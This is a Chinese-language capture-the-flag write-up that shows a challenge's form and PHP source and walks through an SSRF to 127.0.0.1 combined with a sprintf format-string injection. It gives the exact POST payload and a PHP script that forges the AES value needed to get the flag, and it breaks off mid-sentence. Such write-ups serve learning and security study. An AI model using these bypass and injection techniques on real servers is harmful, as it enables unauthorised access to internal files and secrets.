                    <span><label for="q2">请输入你想检测文件内容长度的url</label></span>
                    <input id="q2" name="q2" type="text"/>
                </li>
                <li>
                    <span><label for="q1">你希望以何种方式访问？GET？POST?</label></span>
                    <input id="q3" name="q3" type="text"/>
                </li>
            </ol>
            <button class="submit" type="submit" value="submit">提交</button>
            <div class="controls">
                <button class="next"></button>
                <div class="progress"></div>
                <span class="number">
					<span class="number-current"></span>
					<span class="number-total"></span>
				</span>
                <span class="error-message"></span>
            </div>
        </div>
        <span class="final-message"></span>
    </form>
    <span><p><center><a href="https://gem-love.com" target="_blank">@颖奇L'Amore</a></center></p></span>
</section>

<script type="text/javascript" src="js/classie.js"></script>
<script type="text/javascript" src="js/stepsForm.js"></script>
<script type="text/javascript">
    var theForm = document.getElementById( 'theForm' );

    new stepsForm( theForm, {
        onSubmit : function( form ) {
            classie.addClass( theForm.querySelector( '.simform-inner' ), 'hide' );
            var messageEl = theForm.querySelector( '.final-message' );
            form.submit();
            messageEl.innerHTML = 'Ok...Let me have a check';
            classie.addClass( messageEl, 'show' );
        }
    } );
</script>

</body>
</html>
<?php

$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';


if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
    $url = $_POST['q2'].".y1ng.txt";
    $method = $_POST['q3'];

    $str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";

    echo $str1;

    if (!preg_match($filter1, $url) ){
        die($str2);
    }
    if (preg_match($filter2, $url)) {
        die($str3);
    }
    if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
        die($str4);
    }
    $detect = @file_get_contents($url, false);
    print(sprintf("$url method&content_size:$method%d", $detect));
}

?>

根据我们的输入定义一个语句。在最后根据url 利用 @file_get_contents($url, false); 得到里面的内容

然后利用sprintf 来打印。

根据 home.php 里面的过滤

猜测有一个 admin.php

且因为这个过滤我们也不能用伪协议读取。

所以只能根据 system.php 来想办法得到。

最后有一句

print(sprintf("$url method&content_size:$method%d", $detect));

根据我我们的 url method detect 三个参数来得到

detect 参数是更具 $detect = @file_get_contents($url, false); 得到的

url 根据我们传入的 q2 字符串加上字符串 .y1ng.txt (可以利用参数 ?x=.ying.txt 这样绕过；也可以通过 #(锚点)绕过)

这里 detect 的内容利用的是格式化字符串 %d 但是如果我们要答应 detect 的文本内容。我们必须利用 %s

更具上面。我们发现 method 是我们传入的 q3 且判读的时候只判断了是否开头为 GET 或者是 POST。说明这个 GET（POST）的后面是还可以加其他字符的。

我们可以利用这个点在method 中加入格式化字符串 %s 这样我们就能利用其来得到 detect 的。

然后发现我们的 url 参数要判断是否开头为 http://127.0.0.1/ 根据这个点。我们知道，这应该是一个 ssrf 的利用。

根据上面分析。

q1(没有利用到 可以为任意值)
q2(url 我们的输入开头为 http://127.0.0.1/ 且利用 GET传参 或 锚点绕过字符串拼接 )
q3(method 我们的输入 开头为 GET 或者 POST，且要在后面添加 %s 实现答应 url 指定的文件内容)

payload
q1=1&q2=http://127.0.0.1/admin.php#&q3=GET%s% （%s 后面要利用 % 或者 GET%1$s 来指定不然 最后的%d 会存在格式化字符串漏洞。

得到 system 的源码

admin.php

<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake

function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

function Check()
{
    if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
        return true;
    else
        return false;
}

if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} else {
    echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}


$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {
    $decr = $_GET['decrypt'];
    if (Check()){
        $data = $_SESSION['secret'];
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;
        } else {
            die('爬');
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));
}

根据代码逻辑

我们要传入

decrypt 参数。然后执行完 Check() 函数，接着让 $decr === $cipher 这样我们就能执行到 echo WHAT_YOU_WANT; 从而得到 flag

进过函数 aesEn 得到 $cipher

<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake

function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

根据我们的访问ip 从而生成的 $cipher

所以我们直接利用脚本得到 $decr

<?php
function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5('your_ip',true); 
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}
echo aesEn('','y1ng');
?>

利用生成的直接得到